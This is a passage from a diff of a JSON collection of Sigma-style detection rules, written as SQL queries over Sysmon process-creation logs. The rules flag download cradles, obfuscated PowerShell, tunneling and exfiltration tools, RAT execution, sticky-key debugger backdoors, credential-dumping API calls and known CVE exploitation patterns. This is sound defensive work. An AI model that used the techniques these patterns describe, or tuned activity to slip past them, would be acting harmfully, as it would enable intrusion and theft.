ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + "filename": "proc_creation_win_powershell_decode_gzip.yml" }, { - "title": "Potential Commandline Obfuscation Using Escape Characters", - "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", - "status": "test", - "description": "Detects potential commandline obfuscation using known escape characters", - "author": "juju4", + "title": "Use of Scriptrunner.exe", + "id": "64760eef-87f7-4ed3-93fd-655668ea9420", + "status": "experimental", + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use when App-v is deployed" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" + "filename": "proc_creation_win_lolbin_scriptrunner.yml" }, { "title": "Use Short Name Path in Image", @@ -12342,1263 +12237,1205 @@ "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" }, { - "title": "Potential Remote Desktop Tunneling", - "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", - "status": "experimental", - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "author": "Tim Rauch", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" - }, - { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious Msiexec Quiet Install From Remote Location", - "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "title": "Suspicious WindowsTerminal Child Processes", + "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "status": "experimental", - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "Other legitimate \"Windows Terminal\" profiles" ], "level": "medium", - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msiexec_install_remote.yml" + "filename": "proc_creation_win_windows_terminal_susp_children.yml" }, { - "title": "MsiExec Web Install", - "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "title": "Suspicious PowerShell Invocation From Script Engines", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "status": "test", - "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Microsoft Operations Manager (MOM)", + "Other scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msiexec_web_install.yml" + "filename": "proc_creation_win_powershell_script_engine_parent.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", + "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "status": "experimental", + "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "WSL (Windows Sub System For Linux)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_mstsc_remote_connection.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", - "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", + "status": "experimental", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "title": "AgentExecutor PowerShell Execution", + "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" - ], - "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_servu_susp_child_process.yml" - }, - { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", - "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_lolbin_agentexecutor.yml" }, { - "title": "Suspicious Runscripthelper.exe", - "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", - "status": "test", - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "author": "Victor Sergeev, oscd.community", + "title": "Application Removed Via Wmic.EXE", + "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "status": "experimental", + "description": "Uninstall an application with wmic", + "author": "frac113", "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_runscripthelper.yml" + "filename": "proc_creation_win_wmic_uninstall_application.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "status": "experimental", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Exfiltration and Tunneling Tools Execution", + "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Execution of well known tools for data exfiltration and tunneling", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\plink.exe' ESCAPE '\\' OR Image LIKE '%\\\\socat.exe' ESCAPE '\\' OR Image LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR Image LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.execution", - "attack.t1106" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' 